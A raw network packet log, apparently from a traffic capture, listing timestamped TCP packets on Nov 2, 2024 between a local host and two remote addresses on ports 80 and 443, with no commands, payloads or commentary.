                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527067900 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527084112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527199030 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527218103 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527229071 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527236938 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527251959 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527266979 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527276039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527287960 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527297974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527326107 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527334929 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527345896 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527345896 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527364969 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527375937 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527381897 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527388096 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527399063 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527419090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527430058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527439117 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527451992 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527479887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527482033 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527493000 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527513027 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527533054 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527599096 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527637005 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527645111 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527654886 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527678013 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527689934 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527728081 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527740002 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527750969 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527776957 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527796030 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527908087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527920008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527930021 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527951002 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.527976036 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528136969 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528167009 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528177977 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528203011 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528229952 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528242111 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528253078 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528264046 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528274059 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528286934 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528290033 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528311968 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528335094 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528342009 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528348923 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528388023 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528487921 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528498888 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528511047 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528522015 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528527975 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528533936 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528557062 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528561115 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528570890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528584957 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528589010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528597116 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528604031 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528614998 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528618097 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528626919 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528630018 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528645039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528646946 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528657913 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528670073 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528673887 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528681993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528688908 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528692961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528704882 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528712988 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528717995 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528738022 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528755903 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528763056 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528769016 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528789997 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528789997 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528801918 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528814077 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528816938 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528829098 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.528855085 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.592719078 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.593554020 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.593580961 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.594010115 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.594016075 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.607564926 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.608445883 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.608486891 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.608848095 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.608863115 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643759966 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643771887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643781900 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643826962 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643838882 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643845081 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643851042 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643862963 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643882036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643892050 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643903017 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643915892 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.643927097 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644028902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644028902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644028902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644028902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644028902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644392967 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644494057 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644505024 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644515038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644532919 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644539118 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644546032 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644556999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644570112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644576073 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644584894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644593954 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644596100 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644615889 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644638062 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644678116 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644689083 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644699097 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644709110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644722939 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644726992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644740105 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644751072 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644752979 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644762039 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644762993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644774914 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644784927 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644789934 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644802094 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644804955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644817114 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644829035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644829988 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644839048 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644853115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644855976 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644879103 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644881010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644893885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644901991 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644925117 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644937992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644947052 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644951105 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644963026 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644973040 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644978046 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644984007 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644985914 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.644995928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645010948 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645013094 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645028114 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645040035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645050049 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645052910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645056009 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645066977 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645076990 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645088911 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645088911 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645112038 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645133018 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645138979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645150900 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645155907 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645162106 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645172119 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645186901 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645195961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645196915 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645229101 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645255089 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645255089 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645266056 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645276070 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645287991 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645299911 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645302057 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645317078 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645345926 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645355940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645399094 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645401955 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645411015 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645438910 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645450115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645474911 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645486116 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645495892 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645505905 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645518064 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.645546913 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.678874969 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.679250002 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.679306030 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.679647923 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.679661989 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.691509008 CET4436382713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.691834927 CET63827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.691862106 CET4436382713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692219019 CET63827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692225933 CET4436382713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692395926 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692408085 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692418098 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692454100 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692481995 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692760944 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692810059 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692811012 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692857981 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692929983 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692939997 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692956924 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692967892 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692977905 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692981958 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692990065 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.692991018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693002939 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693017006 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693039894 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693074942 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693118095 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693183899 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693231106 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693243027 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693253040 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693273067 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693293095 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693294048 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693305016 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693324089 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693353891 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693403959 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693442106 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693450928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693463087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693473101 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693492889 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693512917 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.693531990 CET8063819185.215.113.16192.168.2.4
